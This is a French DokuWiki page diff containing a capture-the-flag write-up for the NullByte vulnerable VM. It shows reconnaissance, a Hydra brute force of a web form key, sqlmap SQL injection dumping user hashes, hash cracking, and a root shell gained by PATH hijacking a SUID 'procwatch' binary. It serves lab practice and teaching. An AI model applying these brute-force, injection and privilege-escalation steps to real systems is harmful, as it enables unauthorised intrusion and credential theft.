Ci-dessous, les différences entre deux révisions de la page.
— |
vm:nullbyte [2017/08/08 09:31] (Version actuelle) arkinar créée |
||
---|---|---|---|
Ligne 1: | Ligne 1: | ||
+ | **NullByte - Write Up** | ||
+ | __Reconnaissance__ | ||
+ | |||
+ | <code BASH> | ||
+ | |||
+ | ports ouverts : | ||
+ | |||
+ | nmap -sS 192.168.43.111 | ||
+ | |||
+ | Starting Nmap 6.47 ( http://nmap.org ) at 2017-08-08 09:34 CEST | ||
+ | Nmap scan report for NullByte (192.168.43.111) | ||
+ | Host is up (0.00062s latency). | ||
+ | Not shown: 997 closed ports | ||
+ | PORT STATE SERVICE | ||
+ | 80/tcp open http | ||
+ | 111/tcp open rpcbind | ||
+ | 777/tcp open multiling-http | ||
+ | |||
+ | </code> | ||
+ | |||
+ | |||
+ | Port 111 : | ||
+ | <code bash> | ||
+ | rpcinfo -p 192.168.43.111 | ||
+ | program vers proto port service | ||
+ | 100000 4 tcp 111 portmapper | ||
+ | 100000 3 tcp 111 portmapper | ||
+ | 100000 2 tcp 111 portmapper | ||
+ | 100000 4 udp 111 portmapper | ||
+ | 100000 3 udp 111 portmapper | ||
+ | 100000 2 udp 111 portmapper | ||
+ | 100024 1 udp 38070 status | ||
+ | 100024 1 tcp 50679 status | ||
+ | </code> | ||
+ | |||
+ | Port 777 : | ||
+ | |||
+ | <code bash> | ||
+ | nc 192.168.43.111 777 | ||
+ | SSH-2.0-OpenSSH_6.7p1 Debian-5 | ||
+ | </code> | ||
+ | |||
+ | __Exploitation Web__ | ||
+ | |||
+ | Pour le port 80 : | ||
+ | |||
+ | {{ :vm:nullbyte_web.png?nolink |}} | ||
+ | |||
+ | Avec l'outil [[https://sourceforge.net/projects/dirb/files/ | dirb]] on va chercher les fichiers existants : | ||
+ | <code BASH> | ||
+ | ./dirb http://192.168.43.111/ wordlists/common.txt | ||
+ | |||
+ | ---- Scanning URL: http://192.168.43.111/ ---- | ||
+ | + http://192.168.43.111/index.html (CODE:200|SIZE:196) | ||
+ | ==> DIRECTORY: http://192.168.43.111/javascript/ | ||
+ | ==> DIRECTORY: http://192.168.43.111/phpmyadmin/ | ||
+ | ==> DIRECTORY: http://192.168.43.111/uploads/ | ||
+ | |||
+ | </code> | ||
+ | |||
+ | Dans le dossier uploads : | ||
+ | |||
+ | <code html> | ||
+ | |||
+ | <html> | ||
+ | <head><title>Uploads dir</title></head> | ||
+ | <body> | ||
+ | <p>Directory listing not allowed here.</p> | ||
+ | </body> | ||
+ | </html> | ||
+ | |||
+ | </code> | ||
+ | |||
+ | Dans le dossier phpmyadmin : | ||
+ | |||
+ | {{ :vm:nullbyte_phpmyadmin.png?nolink |}} | ||
+ | |||
+ | La version 4.2.12 est faillible uniquement aux XSS et au DOS. | ||
+ | |||
+ | Le dossier javascript contient les fichiers jquery. | ||
+ | |||
+ | En retournant voir l'image d'accueil : | ||
+ | |||
+ | <code bash> | ||
+ | exiftool main.gif | ||
+ | ExifTool Version Number : 9.74 | ||
+ | File Name : main.gif | ||
+ | Directory : . | ||
+ | File Size : 16 kB | ||
+ | File Modification Date/Time : 2017:08:08 09:56:17+02:00 | ||
+ | File Access Date/Time : 2017:08:08 09:56:17+02:00 | ||
+ | File Inode Change Date/Time : 2017:08:08 09:56:17+02:00 | ||
+ | File Permissions : rw-r--r-- | ||
+ | File Type : GIF | ||
+ | MIME Type : image/gif | ||
+ | GIF Version : 89a | ||
+ | Image Width : 235 | ||
+ | Image Height : 302 | ||
+ | Has Color Map : No | ||
+ | Color Resolution Depth : 8 | ||
+ | Bits Per Pixel : 1 | ||
+ | Background Color : 0 | ||
+ | Comment : P-): kzMb5nVYJw | ||
+ | Image Size : 235x302 | ||
+ | </code> | ||
+ | |||
+ | Un dossier **kzMb5nVYJw** existe sur le site web. | ||
+ | |||
+ | Une clé nous est demandée : | ||
+ | |||
+ | {{ :vm:nullbyte_key.png?nolink |}} | ||
+ | |||
+ | Dans le code source : | ||
+ | |||
+ | {{ :vm:nullbyte_kzmb5vyjw_comment.png?nolink |}} | ||
+ | |||
+ | On bruteforce la clé avec Hydra : | ||
+ | |||
+ | <code bash> | ||
+ | hydra 192.168.43.111 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l ignore -P /home/ark1nar/outils/wordlist/rockyou.txt | ||
+ | </code> | ||
+ | |||
+ | {{ :vm:nullbyte_hydra.png?nolink |}} | ||
+ | |||
+ | La clé est : **elite** | ||
+ | |||
+ | {{ :vm:nullbyte_search.png?nolink |}} | ||
+ | |||
+ | On valide le formulaire sans entrer de nom d'utilisateur : | ||
+ | |||
+ | {{ :vm:nullbyte_kzmb5vyjw_search.png?nolink |}} | ||
+ | |||
+ | Nous avons deux utilisateurs : | ||
+ | - ramses | ||
+ | - isis | ||
+ | |||
+ | Le champs usrtosearch est faillible au injection SQL : | ||
+ | <code bash> | ||
+ | ./sqlmap.py -u http://192.168.43.111/kzMb5nVYJw/420search.php\?usrtosearch=ramses --dbs | ||
+ | |||
+ | back-end DBMS: MySQL >= 5.5 | ||
+ | available databases [5]: | ||
+ | [*] information_schema | ||
+ | [*] mysql | ||
+ | [*] performance_schema | ||
+ | [*] phpmyadmin | ||
+ | [*] seth | ||
+ | |||
+ | </code> | ||
+ | |||
+ | <code bash> | ||
+ | ./sqlmap.py -u http://192.168.43.111/kzMb5nVYJw/420search.php\?usrtosearch=ramses -D seth -T users --dump | ||
+ | </code> | ||
+ | {{ :vm:nullbyte_sqli.png?nolink |}} | ||
+ | |||
+ | <code bash> | ||
+ | echo 'YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE' | base64 -d | ||
+ | c6d6bd7ebf806f43c76acc3681703b81 | ||
+ | </code> | ||
+ | |||
+ | On trouve la correspondance du md5 sur [[https://crackstation.net/]] | ||
+ | {{ :vm:nullbyte_md5.png?nolink |}} | ||
+ | |||
+ | On se connecte grâce aux identifiants ramses/omega en SSH sur le serveur (port 777). | ||
+ | |||
+ | __Exploitation système & Élévation de privilège__ | ||
+ | |||
+ | Récupération des informations systèmes : | ||
+ | <code bash> | ||
+ | ramses@NullByte:~$ uname -a | ||
+ | Linux NullByte 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt11-1+deb8u2 (2015-07-17) i686 GNU/Linux | ||
+ | |||
+ | ramses@NullByte:~$ lsb_release -a | ||
+ | No LSB modules are available. | ||
+ | Distributor ID: Debian | ||
+ | Description: Debian GNU/Linux 8.1 (jessie) | ||
+ | Release: 8.1 | ||
+ | Codename: jessie | ||
+ | </code> | ||
+ | |||
+ | Récupération de la liste des binaires suid : | ||
+ | <code bash> | ||
+ | ramses@NullByte:~$ find / -user root -perm -4000 -print 2>/dev/null | ||
+ | /usr/lib/openssh/ssh-keysign | ||
+ | /usr/lib/policykit-1/polkit-agent-helper-1 | ||
+ | /usr/lib/eject/dmcrypt-get-device | ||
+ | /usr/lib/pt_chown | ||
+ | /usr/lib/dbus-1.0/dbus-daemon-launch-helper | ||
+ | /usr/bin/procmail | ||
+ | /usr/bin/chfn | ||
+ | /usr/bin/newgrp | ||
+ | /usr/bin/chsh | ||
+ | /usr/bin/gpasswd | ||
+ | /usr/bin/pkexec | ||
+ | /usr/bin/passwd | ||
+ | /usr/bin/sudo | ||
+ | /usr/sbin/exim4 | ||
+ | /var/www/backup/procwatch | ||
+ | /bin/su | ||
+ | /bin/mount | ||
+ | /bin/umount | ||
+ | /sbin/mount.nfs | ||
+ | </code> | ||
+ | |||
+ | Vérification de la vulnérabilité exim4 : | ||
+ | <code bash> | ||
+ | ramses@NullByte:~$ /usr/sbin/exim4 --version | ||
+ | Exim version 4.84 #3 built 17-Feb-2015 17:01:53 | ||
+ | Copyright (c) University of Cambridge, 1995 - 2014 | ||
+ | (c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2014 | ||
+ | Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013) | ||
+ | Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM PRDR OCSP | ||
+ | Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd | ||
+ | Authenticators: cram_md5 plaintext | ||
+ | Routers: accept dnslookup ipliteral manualroute queryprogram redirect | ||
+ | Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp | ||
+ | Fixed never_users: 0 | ||
+ | Size of off_t: 8 | ||
+ | Configuration file is /var/lib/exim4/config.autogenerate | ||
+ | </code> | ||
+ | |||
+ | La version 4.84 est vulnérable à une élévation de privilège à condition que le Perl soit dans la configuration. | ||
+ | |||
+ | Ce n'est pas le cas ici. | ||
+ | |||
+ | Vérification du bash_history de l'utilisateur ramses | ||
+ | <code bash> | ||
+ | bash-4.3$ cat .bash_history | ||
+ | sudo -s | ||
+ | su eric | ||
+ | exit | ||
+ | ls | ||
+ | clear | ||
+ | cd /var/www | ||
+ | cd backup/ | ||
+ | </code> | ||
+ | |||
+ | Le binaire procwatch est suspect : | ||
+ | <code bash> | ||
+ | ramses@NullByte:/var/www/backup$ ./procwatch | ||
+ | PID TTY TIME CMD | ||
+ | 1354 pts/0 00:00:00 procwatch | ||
+ | 1355 pts/0 00:00:00 sh | ||
+ | 1356 pts/0 00:00:00 ps | ||
+ | </code> | ||
+ | |||
+ | Exploitation de procwatch : | ||
+ | <code bash> | ||
+ | ramses@NullByte:/var/www/backup$ echo '/bin/sh' > ps | ||
+ | |||
+ | ramses@NullByte:/var/www/backup$ env | ||
+ | USER=ramses | ||
+ | PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games | ||
+ | PWD=/var/www/backup | ||
+ | HOME=/home/ramses | ||
+ | |||
+ | ramses@NullByte:/var/www/backup$ export PATH=/var/www/backup:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games | ||
+ | ramses@NullByte:/var/www/backup$ chmod +x ps | ||
+ | |||
+ | ramses@NullByte:/var/www/backup$ ./procwatch | ||
+ | # id | ||
+ | uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses) | ||
+ | </code> | ||
+ | |||
+ | Nous sommes maintenant root. Affichons le flag : | ||
+ | <code bash> | ||
+ | # cat /root/proof.txt | ||
+ | adf11c7a9e6523e630aaf3b9b7acb51d | ||
+ | |||
+ | It seems that you have pwned the box, congrats. | ||
+ | Now you done that I wanna talk with you. Write a walk & mail at | ||
+ | xly0n@sigaint.org attach the walk and proof.txt | ||
+ | If sigaint.org is down you may mail at nbsly0n@gmail.com | ||
+ | |||
+ | |||
+ | USE THIS PGP PUBLIC KEY | ||
+ | |||
+ | -----BEGIN PGP PUBLIC KEY BLOCK----- | ||
+ | Version: BCPG C# v1.6.1.0 | ||
+ | |||
+ | mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ | ||
+ | Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT | ||
+ | e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq | ||
+ | Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK | ||
+ | +z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe | ||
+ | YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu | ||
+ | Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS | ||
+ | HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q | ||
+ | m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn | ||
+ | XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58 | ||
+ | kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8 | ||
+ | TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU | ||
+ | Gms= | ||
+ | =PiAQ | ||
+ | -----END PGP PUBLIC KEY BLOCK----- | ||
+ | </code> | ||
+ | |||
+ | Merci à l'auteur de la machine. |